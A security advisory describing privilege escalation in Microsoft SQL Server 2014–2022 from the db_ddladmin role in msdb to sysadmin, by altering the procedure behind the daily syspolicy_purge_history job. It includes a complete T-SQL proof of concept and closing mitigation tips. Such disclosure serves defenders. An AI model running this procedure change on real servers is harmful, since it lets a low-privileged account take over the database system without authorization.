Title: SQL Server Privilege Escalation from db_ddladmin to sysadmin
Product:                   Microsoft SQL Server
Affected Version(s):       2014,2016,2017,2019,2022
Tested Version(s):         2014,2016,2017,2019,2022
Risk Level:                Medium
Author of Advisory:        Emad Al-Mousa

Overview:

Privilege Escalation is a serious security attack that attackers seek to compromise IT infrastructure and systems. attackers will either exploit vulnerabilites or misconfiguration in the system to escalate their permissions and take over the whole system.

*****************************************
Vulnerability Details:

By design when you install SQL Server database engine a job is created called “syspolicy_purge_history” , and this job by design will run every day. This job can be weaponized for privilege escalation attack.

attacker will require to compromise a database account that is added in MSDB system database and is granted db_ddladmin role.


*****************************************
Proof of Concept (PoC):


I will create a dummy account called “toto”  (for the sake of simulation it will be SQL Authenticated account):

USE [master]

GO

CREATE LOGIN [toto] WITH PASSWORD=N'toto', DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF

GO

And, then I will add the account as database user in system database MSDB with db_ddladmin permission:

USE [msdb]

GO

CREATE USER [toto] FOR LOGIN [toto]

GO

USE [msdb]

GO

ALTER ROLE [db_ddladmin] ADD MEMBER [toto]

GO

Then, I will execute the following modification code against the procedure:

USE [msdb]

GO

ALTER  PROCEDURE [dbo].[sp_syspolicy_purge_history]

AS

BEGIN

ALTER SERVER ROLE [sysadmin] ADD MEMBER [toto]

END


The next scheduled run-time for the job syspolicy_purge_history, the account toto will be escalated to SYSADMIN role, which means he will he/she will take over the whole SQL Server database system.


-***- To protect from such attacks you will need to follow these security tips:

Implement in-place auditing for privilege escalation attacks [smart auditing….don’t audit everything as auditing will impose performance overhead]

Implement least privilege concept in your environment, do not grant any account extra permissions that can be weaponized for security breach.

Strong Identity and account management approach should be in-place, passwords policies are important to make brute force attacks challenging.

patch your environments , and follow best security practices.

*****************************************
References:
https://databasesecurityninja.wordpress.com/2024/01/07/sql-server-privilege-escalation-from-db_ddladmin-to-sysadmin/
https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles?view=sql-server-ver16